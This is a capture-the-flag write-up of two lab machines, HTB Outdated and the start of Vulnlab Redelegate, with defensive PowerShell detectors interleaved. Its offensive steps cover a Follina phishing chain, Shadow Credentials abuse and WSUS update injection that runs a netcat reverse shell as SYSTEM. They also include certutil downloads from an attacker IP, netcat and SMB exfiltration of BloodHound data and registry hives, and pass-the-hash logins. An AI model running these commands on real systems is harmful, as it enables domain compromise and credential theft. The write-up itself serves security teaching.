Author: admin
HTB-OUTDATED
Summary
This machine was initially published with some unintended ways to root (e.g. Zerologon), which have since been patched. The intended privilege escalation is via WSUS.
The machine features several fairly new exploits, such as Follina and WSUS update injection, but it is also a bit unstable, so exploit with patience.
Scanning
Enum
From the above, the target looks like another exercise in AD, LDAP and Kerberos. Let’s find some more info.
> enum4linux outdated.htb
Domain Name: OUTDATED
Domain Sid: S-1-5-21-4089647348-67660539-4016542185
> smbclient -N -L outdated.htb
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.
There is a Shares folder. Connecting to it, we can find more info.
> smbclient -N \\\\outdated.htb\\Shares
smb: \> ls
. D 0 Mon Jun 20 11:01:33 2022
.. D 0 Mon Jun 20 11:01:33 2022
NOC_Reminder.pdf AR 106977 Mon Jun 20 11:00:32 2022
9116415 blocks of size 4096. 1440211 blocks available
smb: \> get NOC_Reminder.pdf
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (33.8 KiloBytes/sec) (average 33.8 KiloBytes/sec)
User: btables
We found a document, NOC_Reminder.pdf. Reading it, we learn that there are unpatched vulnerabilities and that there is a valid mailbox at itsupport@outdated.htb whose owner regularly checks email for links.
One of the listed unpatched vulnerabilities is exploitable via email: CVE-2022-30190.
CVE-2022-30190, also known as Follina, is a relatively recent vulnerability in MS Word/RTF documents: a document can invoke the rarely used Microsoft Support Diagnostic Tool (MSDT), which fetches and runs a malicious script from an embedded link. For more detail, see: https://logrhythm.com/blog/detecting-follina-cve-2022-30190-microsoft-office-zero-day-exploit/
To exploit this, I used this PoC: https://github.com/JohnHammond/msdt-follina
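What makes a Follina document recognisable is the structure described above: the Word package carries an OLE object relationship whose target is external (an http(s) or ms-msdt: link) rather than a part inside the file. The following PowerShell is an added example, not code from this page or from the PoC it links. It builds a constructed sample .docx containing only such a relationships part and scans it; the temporary file name and the example.test URL are made up for the demonstration.

```powershell
Add-Type -AssemblyName System.IO.Compression
Add-Type -AssemblyName System.IO.Compression.FileSystem

# Constructed word/_rels/document.xml.rels: a normal internal part, an ordinary external
# hyperlink, and the shape Follina documents use, an oleObject with an external target.
$SampleRels = @'
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.test/" TargetMode="External"/>
  <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://example.test/msdt.html!" TargetMode="External"/>
</Relationships>
'@

function New-SampleDocx {
    # Writes a minimal zip holding only the relationships part; enough for the scanner below.
    param([Parameter(Mandatory)][string]$Path)
    if (Test-Path $Path) { Remove-Item $Path -Force }
    $zip = [System.IO.Compression.ZipFile]::Open($Path, [System.IO.Compression.ZipArchiveMode]::Create)
    try {
        $writer = New-Object System.IO.StreamWriter($zip.CreateEntry('word/_rels/document.xml.rels').Open())
        try { $writer.Write($SampleRels) } finally { $writer.Dispose() }
    } finally {
        $zip.Dispose()
    }
}

function Get-DocxExternalRelationships {
    # Lists every relationship in word/_rels/document.xml.rels whose target lies outside the
    # package. An oleObject relationship pointing at http(s) or ms-msdt: is the Follina pattern.
    param([Parameter(Mandatory)][string]$Path)
    $zip = [System.IO.Compression.ZipFile]::OpenRead($Path)
    try {
        $entry = $zip.GetEntry('word/_rels/document.xml.rels')
        if (-not $entry) { return @() }
        $reader = New-Object System.IO.StreamReader($entry.Open())
        try { [xml]$rels = $reader.ReadToEnd() } finally { $reader.Dispose() }
        foreach ($rel in $rels.Relationships.Relationship) {
            if ($rel.TargetMode -ne 'External') { continue }
            $kind = ($rel.Type -split '/')[-1]
            [PSCustomObject]@{
                Id         = $rel.Id
                Kind       = $kind
                Target     = $rel.Target
                Suspicious = ($kind -eq 'oleObject') -and ($rel.Target -match '^(https?|ms-msdt):')
            }
        }
    } finally {
        $zip.Dispose()
    }
}

$sample = Join-Path $env:TEMP 'follina-sample.docx'   # constructed file, not a real document
New-SampleDocx -Path $sample
Get-DocxExternalRelationships -Path $sample | Format-Table -AutoSize
```

Run against a mail quarantine or a share of incoming attachments, the rId3-style row is the one to alert on: a hyperlink with TargetMode="External" is normal, an external OLE object is not. Microsoft’s guidance for the unpatched case was to remove the ms-msdt: protocol handler (the HKEY_CLASSES_ROOT\ms-msdt key) after backing it up, which breaks the second half of the chain even if such a document is opened.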
Generate Payload
Use some code based on John Hammond’s POC. This POC does a lot of things, generating a Word document that will request the HTML payload, and even providing the webserver and catching the reverse shell. I’ll use just a couple lines that generate that HTML payload:
It’s important to note that the payload must be padded out to larger than 4096 bytes to bypass user activity.
I’ll generate this payload and save it into a file I’ll then serve with Python’s webserver.
Trigger Exploit
I’ll send the link in an email to itsupport@outdated.htb using swaks:
If this works, the user will click the link, requesting the msdt.html page, which I’ll serve, and moments later I should get a request to upload nc64.exe (I’ll make sure there’s a copy in my web root) and then a shell on TCP 443. It works just as expected. Two GET requests:
Then a shell:
User: sflowers
Now we can collect AD information as btables, who is a domain user.
Upload SharpHound.exe to the machine and start collecting domain info.
# download SharpHound to the target
> certutil -urlcache -f http://10.10.14.10:8000/SharpHound.exe SharpHound.exe
# run SharpHound
> SharpHound.exe -c All
# send the result back to the attack box
> nc64.exe 10.10.14.10 5555 < 20241218170837_BloodHound.zip
# listener on the attack box
> nc -nlvp 5555 > output.zip
Alternatively, serve an SMB share from the attack box:
# impacket-smbserver -smb2support share . -user puck -pass puckpuck
and on the client:
c:\temp>net use \\10.10.14.10\share /u:puck puckpuck
net use \\10.10.14.10\share /u:puck puckpuck
The command completed successfully.
c:\temp>copy 20241218170837_BloodHound.zip \\10.10.14.10\share\
copy 20241218170837_BloodHound.zip \\10.10.14.10\share\
1 file(s) copied.
Analysing the output in BloodHound shows that btables belongs to the group itstaff, that itstaff has AddKeyCredentialLink over the user sflowers, and that sflowers has PSRemote access to the DC.
The members of the group ITSTAFF@OUTDATED.HTB have the ability to write to the “msds-KeyCredentialLink” property on SFLOWERS@OUTDATED.HTB. Writing to this property allows an attacker to create “Shadow Credentials” on the object and authenticate as the principal using kerberos PKINIT.
To abuse this privilege, use Whisker.
You may need to authenticate to the Domain Controller as a member of ITSTAFF@OUTDATED.HTB if you are not running a process as a member
Whisker.exe add /target:<TargetPrincipal>
To abuse this privilege from Linux, use pyWhisker:
pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"
Shortest Paths to Unconstrained Delegation Systems
To get the user sflowers, we use a technique called Shadow Credentials; for more detail, refer to: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
Basically, we can add a new value to the msDS-KeyCredentialLink property of sflowers that acts as a valid credential for that user. We then use the credential we created to request a TGT for sflowers, which gives us persistent access as sflowers.
To do so, we need some Windows binaries, which can be downloaded from: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
Note that Whisker needs to be compiled yourself or extracted from here: https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
# upload binaries
> certutil.exe -urlcache -f http://10.10.14.10:8000/Whisker.exe Whisker.exe
> certutil.exe -urlcache -f http://10.10.14.10:8000/Rubeus.exe Rubeus.exe
# run whisker to add a new property as a new credential for sflowers
> Whisker.exe add /target:sflowers
At the end of its output, Whisker prints a Rubeus command that uses the new certificate to request a TGT for sflowers. The certificate password is generated per run (81IrT8oSxfA0pBoe in one run, el84kTr1afLpoMWG in another), so copy the command exactly as printed:
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"el84kTr1afLpoMWG" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
Running this Rubeus.exe asktgt /user:sflowers /certificate:MII... command outputs the ticket and, because of /getcredentials, the account’s NTLM hash.
Note the line NTLM : 1FCDB1F6015DCB318CC77BB2BDA14DB5: this is the NTLM hash of the user sflowers and can be used to authenticate as that user.
Now we can PSRemote into the target as sflowers using the NTLM hash obtained via the shadow credential:
> evil-winrm -i outdated.htb -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
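The BloodHound edge used above, write access to msDS-KeyCredentialLink, is what a defender should look for before anyone else does. The following PowerShell is an added example (not code from this page, nor from Whisker or pyWhisker) that lists every ACE on a given account allowing WriteProperty on that attribute, whether named explicitly or via a blanket write right, and then lists accounts that already carry a key credential. It assumes the RSAT ActiveDirectory module on a domain-joined host; the account name sflowers is taken from the page.

```powershell
Import-Module ActiveDirectory

function Get-KeyCredentialLinkWriters {
    # Returns the ACEs on $SamAccountName that allow writing msDS-KeyCredentialLink.
    param([Parameter(Mandatory)][string]$SamAccountName)

    # Resolve the attribute's schemaIDGUID from the schema instead of hard-coding it.
    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNC `
        -LDAPFilter '(lDAPDisplayName=msDS-KeyCredentialLink)' -Properties schemaIDGUID
    $attrGuid = [guid]::new([byte[]]$attr.schemaIDGUID)

    $target    = Get-ADUser -Identity $SamAccountName
    $acl       = Get-Acl -Path "AD:\$($target.DistinguishedName)"
    $writeProp = [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty

    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ([int]($_.ActiveDirectoryRights -band $writeProp)) -ne 0 -and
        # ObjectType empty = write to all properties (GenericAll, GenericWrite, plain WriteProperty);
        # otherwise the ACE has to name this attribute explicitly.
        ($_.ObjectType -eq [guid]::Empty -or $_.ObjectType -eq $attrGuid)
    } | Select-Object @{n='Principal'; e={ $_.IdentityReference }},
                      @{n='Rights';    e={ $_.ActiveDirectoryRights }},
                      @{n='Inherited'; e={ $_.IsInherited }},
                      @{n='Scope';     e={ if ($_.ObjectType -eq [guid]::Empty) { 'all properties' } else { 'msDS-KeyCredentialLink' } }}
}

function Get-AccountsWithKeyCredentials {
    # Accounts that already have a key credential set. In a domain without Windows Hello for
    # Business or Azure AD device registration, any value here deserves a look.
    Get-ADObject -LDAPFilter '(msDS-KeyCredentialLink=*)' -Properties msDS-KeyCredentialLink |
        Select-Object Name, ObjectClass, @{n='KeyCount'; e={ @($_.'msDS-KeyCredentialLink').Count }}
}

Get-KeyCredentialLinkWriters -SamAccountName 'sflowers' | Format-Table -AutoSize
Get-AccountsWithKeyCredentials | Format-Table -AutoSize
```

Expect the built-in administrative groups in the first listing through inherited GenericAll; a non-administrative group such as itstaff appearing there is the finding. For detection after the fact, Directory Service Changes auditing (event ID 5136) records writes to msDS-KeyCredentialLink, and the PKINIT logon that follows is a 4768 with the Certificate Information fields populated for an account that never enrolled for a certificate.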
PE: WSUS
Enumerating with winPEAS, we find that a WSUS server is configured and that it uses plain HTTP:
[+] Checking WSUS
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
WSUS is using http: http://wsus.outdated.htb:8530
[i] You can test https://github.com/pimps/wsuxploit to escalate privileges
But UseWUServer is equals to , so it may work or not
We continue by checking several registry values.
With a non-HTTPS WSUS server and UseWUServer set to 1, the machine is vulnerable to a WSUS update-injection attack.
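The winPEAS check above comes down to a few registry values. The following PowerShell is an added example (not code from this page, winPEAS or SharpWSUS) that performs the same check on one host and spells out the verdict: WUServer and WUStatusServer live under the WindowsUpdate policy key, and UseWUServer under its AU subkey. Those are the standard policy locations; nothing else is assumed.

```powershell
function Test-WsusClientConfig {
    # Evaluates the Windows Update policy keys that decide whether this client takes updates
    # from a WSUS server, and whether that channel is plaintext HTTP.
    [CmdletBinding()]
    param(
        [string]$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
    )
    $wu = Get-ItemProperty -Path $PolicyKey      -ErrorAction SilentlyContinue
    $au = Get-ItemProperty -Path "$PolicyKey\AU" -ErrorAction SilentlyContinue

    $server    = $wu.WUServer
    $status    = $wu.WUStatusServer
    $useServer = $au.UseWUServer

    $risk = 'Info'
    $reason = 'No WSUS policy set; the client talks to Microsoft Update directly.'
    if ($server) {
        if ($useServer -ne 1) {
            $risk = 'Low'
            $reason = 'WUServer is set but UseWUServer is not 1, so the policy is not in effect.'
        } elseif ($server -match '^http://') {
            $risk = 'High'
            $reason = 'Updates are fetched over plaintext HTTP; whoever controls the WSUS host or the path to it can deliver a signed binary of their choice as an update, to be run as SYSTEM.'
        } elseif ($server -match '^https://') {
            $risk = 'Low'
            $reason = 'WSUS is reached over HTTPS.'
        } else {
            $risk = 'Medium'
            $reason = 'WUServer has an unexpected form; review it by hand.'
        }
    }

    [PSCustomObject]@{
        ComputerName   = $env:COMPUTERNAME
        WUServer       = $server
        WUStatusServer = $status
        UseWUServer    = $useServer
        Risk           = $risk
        Reason         = $reason
    }
}

Test-WsusClientConfig | Format-List
```

The fix is to publish WSUS over HTTPS and point WUServer and WUStatusServer at the https:// URL. On the server side, an approved update that no administrator created (the SharpWSUS output later on this page even prints the delete command for its own artefact) is the trace to look for in the WSUS console and database.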
The most recent write-up on this is the SharpWSUS post from Nettitude, which gives a really nice overview of how WSUS servers provide updates to networks of different size and complexity.
It also links to a GitHub repo with the tool, which I’ll build in Visual Studio just like Whisker above, and upload to the DC:
*Evil-WinRM* PS C:\programdata> upload SharpWSUS.exe sw.exe
Info: Uploading SharpWSUS.exe to sw.exe
Data: 65536 bytes of 65536 bytes copied
Info: Upload successful!
Identify WSUS
The registry key HKLM:\software\policies\microsoft\windows\WindowsUpdate will show the WSUS server in use. From the client:
PS C:\> Get-ItemProperty HKLM:\software\policies\microsoft\windows\WindowsUpdate
And from the DC:
*Evil-WinRM* PS C:\> get-itemproperty HKLM:\software\policies\microsoft\windows\WindowsUpdate
SharpWSUS.exe will do this as well:
*Evil-WinRM* PS C:\programdata> .\sw.exe locate
..snip..
[*] Action: Locate WSUS Server
WSUS Server: http://wsus.outdated.htb:8530
[*] Locate complete
From the client, ping will show that it’s the same host as the DC:
PS C:\> ping wsus.outdated.htb
Resolve-DNSName will also show this (if run from the DC it needs -Server to work):
*Evil-WinRM* PS C:\programdata> Resolve-DNSName -Name wsus.outdated.htb -Type A -Server 127.0.0.1
Name Type TTL Section NameHost
---- ---- --- ------- --------
wsus.outdated.htb CNAME 3600 Answer dc.outdated.htb
Name : dc.outdated.htb
QueryType : A
TTL : 3600
Section : Answer
IP4Address : 10.10.11.175
Name : dc.outdated.htb
QueryType : A
TTL : 3600
Section : Answer
IP4Address : 172.16.20.1
WSUS Information
SharpWSUS.exe will also give information about the clients using the WSUS server:
*Evil-WinRM* PS C:\programdata> .\sw.exe inspect
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Inspect WSUS Server
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.outdated.htb, 172.16.20.1, 10.0.17763.652, 7/22/2022 5:01:44 AM
####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------
####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Unassigned Computers
[*] Inspect complete
It only shows the DC, but that’s where I want SYSTEM anyway.
Exploit
PsExec
WSUS will only run Microsoft-signed binaries. As I have no good way to get a Microsoft signing certificate, I’ll have to use something legitimately signed. The article suggests the Sysinternals tool PsExec. I’ll download Sysinternals, copy PsExec.exe to my webserver, and upload it:
*Evil-WinRM* PS C:\programdata> upload PsExec64.exe \programdata\ps.exe
Info: Uploading PsExec64.exe to \programdata\ps.exe
Data: 685960 bytes of 685960 bytes copied
Info: Upload successful!
Create/Approve Update
I’ll create an update using SharpWSUS.exe. The blog post shows adding an administrator, but I’ll just go for a reverse shell using nc64.exe. The /args for PsExec are -accepteula so that it doesn’t pop a box and wait for a click, -s to run as SYSTEM, and -d to return immediately. The /title is arbitrary.
*Evil-WinRM* PS C:\programdata> .\sw.exe create /payload:"C:\programdata\ps.exe" /args:" -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445" /title:"CVE-2022-30190"
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: ps.exe
[*] Payload Path: C:\programdata\ps.exe
[*] Arguments: -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445
[*] Arguments (HTML Encoded): -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
ImportUpdate
Update Revision ID: 44
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 45
PrepareXMLBundletoClient
DeploymentRevision
[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN /groupname:"Group Name"
[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN
[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN /groupname:"Group Name"
[*] Create complete
I need to approve that update, using the syntax given in the output (/groupname is arbitrary):
*Evil-WinRM* PS C:\programdata> .\sw.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:dc.outdated.htb /groupname:"CriticalPatches"
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Approve Update
Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: CriticalPatches
Added Computer To Group
Approved Update
[*] Approve complete
It takes about a minute for this to fire, and it fails occasionally. If it fails, I’ll try again, but eventually there’s a connection at nc:
Beyond Root – Skipped Steps
PyWhisker Background
With a shell in the Hyper-V container, I built an EXE version of Whisker. There’s also a Python version, pywhisker, which does the same thing but runs from my attack station. The problem is that to run it I’ll need creds for the domain. This wasn’t an issue with the EXE version, which ran in the context of btables and used what Windows had cached for that user to authenticate. But to run it from my VM, I’ll need creds.
The author’s intended path for this box was to exploit HiveNightmare to get creds for btables, and then use those to run pywhisker. That wasn’t necessary, but I’ll still show it here.
HiveNightmare
Background
In July 2021, a researcher noticed that the permissions on the raw registry hive files were misconfigured starting in Windows 10 build 1809, which was first released to the public in October 2018. This got the designation CVE-2021-36934, as well as the names HiveNightmare and SeriousSAM.
icacls shows that the SAM file is readable by all users:
C:\>icacls C:\windows\system32\config\SAM
C:\windows\system32\config\SAM BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
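The icacls output above is the whole finding: a hive that BUILTIN\Users can read. The following PowerShell is an added example (not code from this page or from the HiveNightmare tool) that checks the same thing for SAM, SECURITY and SYSTEM through Get-Acl, flagging any broad principal with read access. It assumes the default %windir%\System32\config location and Windows PowerShell 5 or later.

```powershell
function Test-HiveNightmare {
    # Reports whether the on-disk registry hives are readable by non-privileged principals
    # (CVE-2021-36934). A vulnerable build shows BUILTIN\Users with read access, as in the
    # icacls output above.
    param(
        [string[]]$Hives = @('SAM', 'SECURITY', 'SYSTEM'),
        [string]$ConfigDir = (Join-Path $env:windir 'System32\config')
    )
    $broad = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
    $read  = [System.Security.AccessControl.FileSystemRights]::ReadData

    foreach ($hive in $Hives) {
        $path = Join-Path $ConfigDir $hive
        # Get-Acl reads the security descriptor only; it does not need the file unlocked.
        $acl = Get-Acl -Path $path -ErrorAction Stop
        $offending = @($acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $broad -contains $_.IdentityReference.Value -and
            ([int]($_.FileSystemRights -band $read)) -ne 0
        })
        [PSCustomObject]@{
            Hive       = $path
            Vulnerable = ($offending.Count -gt 0)
            GrantedTo  = ($offending | ForEach-Object { "$($_.IdentityReference) ($($_.FileSystemRights))" }) -join '; '
        }
    }
}

Test-HiveNightmare | Format-Table -AutoSize
```

A Vulnerable = True row is only half the story: as the next section shows, the live hive is locked and the readable copies come from Volume Shadow Copies, so the published workaround has two parts, restoring inheritance on the config directory (icacls %windir%\system32\config\*.* /inheritance:e) and deleting existing shadow copies so that no pre-fix copy remains readable.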
Get Hive Files
Interestingly, I still can’t just copy the files. But a tool like HiveNightmare from researcher GossiTheDog will pull it for me. I’ll grab the compiled EXE from the release page.
I’ll upload it using wget and run it:
PS C:\ProgramData> wget 10.10.14.6/HiveNightmare.exe -outfile hn.exe
PS C:\ProgramData> ./hn
HiveNightmare v0.6 - dump registry hives as non-admin users
Specify maximum number of shadows to inspect with parameter if wanted, default is 15.
Running...
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM
Success: SAM hive from 2022-08-02 written out to current working directory as SAM-2022-08-02
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SECURITY
Success: SECURITY hive from 2022-08-02 written out to current working directory as SECURITY-2022-08-02
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM
Success: SYSTEM hive from 2022-08-02 written out to current working directory as SYSTEM-2022-08-02
Assuming no errors above, you should be able to find hive dump files in current working directory.
It does create copies of the hives in the current directory:
PS C:\ProgramData> ls
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 6/15/2022 6:30 PM Microsoft
d----- 6/15/2022 9:24 AM Microsoft OneDrive
d----- 6/15/2022 9:40 AM Packages
d----- 8/1/2022 7:41 PM regid.1991-06.com.microsoft
d----- 12/7/2019 1:14 AM SoftwareDistribution
d----- 4/9/2021 6:54 AM ssh
d----- 6/15/2022 9:53 AM USOPrivate
d----- 12/7/2019 1:14 AM USOShared
-a---- 8/3/2022 2:10 PM 227328 hn.exe
-a---- 8/3/2022 2:08 PM 45272 nc64.exe
-a---- 8/3/2022 2:10 PM 65536 SAM-2022-08-02
-a---- 8/3/2022 2:10 PM 32768 SECURITY-2022-08-02
-a---- 8/3/2022 2:10 PM 11534336 SYSTEM-2022-08-02
Exfil
To exfil these, I’ll start an SMB server on my box:
I’ll connect to it from Outdated, and then copy the files:
PS C:\ProgramData> net use \\10.10.14.10\share /u:puck 0puckpuck
The command completed successfully.
PS C:\ProgramData> copy *-12-14 \\10.10.14.10\share\
PS C:\ProgramData> copy *-13 \\10.10.14.10\share\
Dump Hashes
With access to these hives, secretsdump.py will return the hashes:
This also includes a plaintext “DefaultPassword” for an unknown user of “5myBPLPDKT3Bfq”. That suggests it’s probably a domain user, and not a local user.
crackmapexec shows these creds are good for btables:
Remote Shadow Credentials
PyWhisker
With creds, I can try to remotely run PyWhisker. It fails:
This shows that the LDAP bind failed because TLS is required. Adding --use-ldaps fixes it:
sflowers has no shadow credentials. I’ll add one:
PKINITtools
The PyWhisker output suggests using PKINITtools to get a TGT. I’ll do that:
For the last step, I’ll need to run the getnthash.py script. I had some issues on my system getting the Python dependencies to run, so I just created a virtual environment (python -m venv venv, then source venv/bin/activate) and installed the requirements again in there (pip install -r requirements.txt). Then it worked:
With that hash, I can get an Evil-WinRM session.
Get the hashes
add user
then secretsdump
That was Fun!
vulnlab-redelegate
Redelegate is a hard-rated Windows machine by Geiseric on Vulnlab. The core concepts here are password spraying, enumerating domain users via MSSQL and diving deeper into kerberos delegation.
Enumeration
Portscan:
...
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
53/tcp   open  domain?
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-23 11:19:37Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
We are dealing with a domain controller, unusual services are FTP (21) and MSSQL (1433). Let’s check FTP first:
└─$ ftp redelegate.vl
Connected to dc.redelegate.vl.
220 Microsoft FTP Service
Name (redelegate.vl:puck): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||55855|)
125 Data connection already open; Transfer starting.
10-20-24  12:11AM                  434 CyberAudit.txt
10-20-24  04:14AM                 2622 Shared.kdbx
10-20-24  12:26AM                  580 TrainingAgenda.txt
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> mget *
Note that binary mode was used to download the files. The file CyberAudit.txt contains:
The file TrainingAgenda.txt shows:
Based on this, we can generate a simple word list following a scheme like “SeasonYear!”.
Since we don’t have any domain users yet, we can only try it against the KeePass file Shared.kdbx, which was also on the share:
We found the password and can now open the KeePass file, for example with keepassxc. One of the credentials inside is for MSSQL, which we saw running on the machine, so we try to connect:
This works, but we only have guest access. One thing we could try is to use xp_dirtree to get the hash of the service account running the service, but in this case it won’t help. Instead, we are going to enumerate domain users from here (even though the sqlguest account is not a domain user).
First, we get the domain name:
Next we get the Domain SID by querying one of the default groups for it (the first 48 bytes will be the domain SID):
We can convert this to a readable string with PowerShell:
We can now enumerate users by varying the part that identifies the user (the RID, here 512), for example with a quick bash loop:
Running it gives the domain users we want:
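The conversion the previous steps describe, written out as an added example (not the page’s own command): a binary SID as SUSER_SID returns it is one revision byte, one sub-authority count byte, a 6-byte big-endian identifier authority and then 4-byte little-endian sub-authorities, so for a domain SID with four sub-authorities the domain part is 24 bytes (48 hex characters) and the final 4 bytes are the RID. The sample value is constructed from the Outdated domain SID shown earlier on this page with RID 512; it is not Redelegate’s SID. Requires PowerShell 5 or later for the ::new syntax.

```powershell
function ConvertFrom-SidHex {
    # Parses a binary SID given as hex (the way MSSQL prints SUSER_SID output) into its parts
    # and cross-checks the manual parse against the .NET SecurityIdentifier parser.
    param([Parameter(Mandatory)][string]$Hex)
    $Hex = $Hex -replace '^0x', ''
    if ($Hex.Length % 2 -ne 0) { throw 'hex string has odd length' }
    $bytes = [byte[]]::new($Hex.Length / 2)
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $bytes[$i] = [Convert]::ToByte($Hex.Substring(2 * $i, 2), 16)
    }
    $revision = [int]$bytes[0]
    $count    = [int]$bytes[1]
    if ($bytes.Length -ne 8 + 4 * $count) {
        throw "expected $(8 + 4 * $count) bytes for $count sub-authorities, got $($bytes.Length)"
    }
    [uint64]$authority = 0                                    # 6 bytes, big-endian
    for ($i = 2; $i -lt 8; $i++) { $authority = ($authority -shl 8) -bor [uint64]$bytes[$i] }
    $subs = @(for ($i = 0; $i -lt $count; $i++) {             # 4 bytes each, little-endian
        [BitConverter]::ToUInt32($bytes, 8 + 4 * $i)
    })
    $sid = "S-$revision-$authority-" + ($subs -join '-')
    $reference = [System.Security.Principal.SecurityIdentifier]::new($bytes, 0).Value
    if ($sid -ne $reference) { throw "manual parse $sid disagrees with .NET parse $reference" }

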